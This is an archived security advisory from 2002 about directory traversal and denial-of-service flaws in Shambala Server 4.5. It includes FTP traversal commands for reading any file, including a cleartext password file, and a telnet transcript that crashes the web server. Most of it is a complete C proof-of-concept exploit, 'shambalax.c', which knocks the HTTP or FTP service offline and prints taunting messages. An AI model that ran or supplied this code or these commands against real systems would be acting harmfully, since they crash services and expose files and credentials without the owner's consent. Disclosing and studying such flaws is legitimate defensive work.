Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: web5404.htm

Shambala server directory traversal and DoS



5th Jun 2002 [SBWID-5404]
COMMAND

	Shambala server direcroty traversal and DoS

SYSTEMS AFFECTED

	Shambala Server 4.5

PROBLEM

	excE @ Telhack 026 Inc [http://www.telhack.tk] found following.
	

	Shambala Server is a personal Web/FTP server for  Win  9*/NT.  When  the
	web server is started it also starts the integrated  FTP  server.  There
	are are two previous issues  that  has  been  disclosed  on  bugtraq  by
	zillion in 2000 but he seem to have missed these things.
	

	The integrated  FTP  server  is  vulnerable  to  a  directory  traversal
	attack, that enables attackers to view the  entire  directory  structure
	and also download any file  in  it.  There  are  also  a  DoS  condition
	present in the web server.
	

	

	

	 Impact 

	 ======

	

	An authenticated user may view any directory and/or  download  any  file
	on the system. An authenticated  user  may  use  this  to  download  the
	!_cleartext_! password file that lies one .. below the web root.
	

	I have also found a DoS condition  in  the  Web  server  that  generates
	\"Run-time error\'5\': Invalid procedure call or argument\" and  crashes
	the server.
	

	According to www.download.com, the program has  been  downloaded  57,957
	times and 40 times last week. So it seems like this program is still  at
	use.
	

	

	

	 Exploits

	 ========

	

	

	 Directory traversal / get any file

	 ----------------------------------

	

	

	ftp> ls ../../../  - and so on...

	ftp> get ../../../ - and so on...

	

	

	 DoS condition in the Web server

	 -------------------------------

	

	

	you# telnet 192.168.0.11 80

	Trying 192.168.0.11...

	Connected to 192.168.0.11.

	Escape character is \'^]\'.

	GET !\"#¤%&/()=?

	Connection closed by foreign host.

	you#

	

	

	

	 Update (10 July 2002)

	 ======

	

	Daniel Nyström (excE) [exce@netwinder.nu] DoS exploit :
	

	

	/******** shambalax.c ***********************************************************

	*                                                       			*

	* PoC exploit for the DoS in Shambala Server 4.5        			*

	* as described in Telhack 026 Inc. S.A. #3 (BID:4897).  			*

	* I have also built in a function that exploits another 			*

	* DoS condition found by zillion a long long time ago.  			*

	* Also refined my DoS a little bit by just using one                            *

	* char that mess up Shambala.                                                   *

	*                                                       			*

	* By: Daniel Nyström (excE) <exce@netwinder.nu>         			*

	*                                                       			*

	*                                                       			*

	* Notes:                                                                        *

	* I found that zillion had only been almost right, it                           * 

	* is not opening a lot of TCP connection that generates                         *

	* the DoS that he found, it is just one TCP connection,                         *

	* but it certainly has to do with bad connection handling                       *

	* by Shambala.                                                                  *

	*                                                                               *

	*                                                                               *

	*                                                                               *

	* Credits:                                                                      *

	* Zillion <zillion@safemode.org> - for discovering the FTP DoS                  *

	*                                                       			*

	* Greetz:                                                                       *

	* Xenogen <*****@**********.***> - for promising to report any segfaults :)     *

	* X-Rewt  <*****@**********.***> - Cuz he\'s in my school :P                     *

	* Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :))    *

	*                                                                               *

	*********************************************************** shambalax.c ********/

	

	#include <stdio.h>

	#include <stdlib.h>

	#include <errno.h>

	#include <string.h>

	#include <sys/types.h>

	#include <netinet/in.h>

	#include <netdb.h>

	#include <sys/socket.h>

	

	

	int main(int argc, char *argv[])

	{

		int sockfd;

		int port;

		int numbytes;

		

		struct sockaddr_in target;

		struct hostent *he;

	

		if (argc != 3)

		{

			fprintf(stderr, \"\\n-- Shambala Server 4.5 DoS exploit --\\n\");

			fprintf(stderr, \"\\nUsage: %s <target> <type>\", argv[0]);

			fprintf(stderr, \"\\nTypes:\");

			fprintf(stderr, \"\\n1  -  HTTPD DoS\");

			fprintf(stderr, \"\\n2  -  FTP DoS\\n\\n\");

			exit(1);

		}

		

		printf(\"\\n-- Shambala Server 4.5 DoS exploit --\\n\\n\");

		printf(\"-> Starting...\\n\");	

		printf(\"->\\n\");

	

		if ((he=gethostbyname(argv[1])) == NULL)

		{

			herror(\"gethostbyname\");

			exit(1);

		}

	

		if ((sockfd=socket(AF_INET, SOCK_STREAM,0)) == -1)

		{

			perror(\"socket\");

			exit(1);

		}

	

		/* HTTPD DoS */

		if(argv[2][0] == \'1\')

		{

			port = 80;

			target.sin_family = AF_INET;

			target.sin_port = htons(port);

			target.sin_addr = *((struct in_addr *)he->h_addr);

			bzero(&(target.sin_zero), 8);

			printf(\"-> Connecting to %s:80...\\n\", inet_ntoa(target.sin_addr));

			printf(\"->\\n\");

			if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)

			{

				perror(\"connect\");

				exit(1);

			}

			printf(\"-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\\n\");	

			printf(\"->\\n\");

			if(send(sockfd, \"!\\r\\n\", 3, 0) == -1)

			{

				perror(\"send\");

				exit(1);

			}	

			close(sockfd);

		}

		else

		

		/* FTPD DoS */

		if(argv[2][0] == \'2\')

		{

	                port = 21;

	                target.sin_family = AF_INET;

	                target.sin_port = htons(port);

	                target.sin_addr = *((struct in_addr *)he->h_addr);

	                bzero(&(target.sin_zero), 8);

	                printf(\"-> Making a TCP connection (!which crashes server!) to %s:21...\\n\", inet_ntoa(target.sin_addr));

	                printf(\"->\\n\");

	                if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)

	                {

	                        perror(\"connect\");

	                        exit(1);

	                }

	                close(sockfd);

		}

		else

		{

			fprintf(stderr, \"\\n\\nError: Bad type definition (use 1 or 2 for <type>).\\n\\n\");

			exit(1);		

		}

	

		printf(\"-> Exploit finished nicely. %s\'s Shambala is probably dead by now.\\n\\n\", argv[1]);

	

	}

	

	/* EOF - Shambala Server 4.5 DoS exploit     */

	/* Daniel Nyström (excE) <exce@netwinder.nu> */

	

SOLUTION

	Spent almost 20 minutes digging in  the  evolvable.com  website  for  an
	e-mail adress to contact them by, but none found. So I ended  up  taking
	the e-mail adress from another (2 year old) advisory.  Still  no  reply.
	So the fix for now is: Uninstall Shambala.
	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH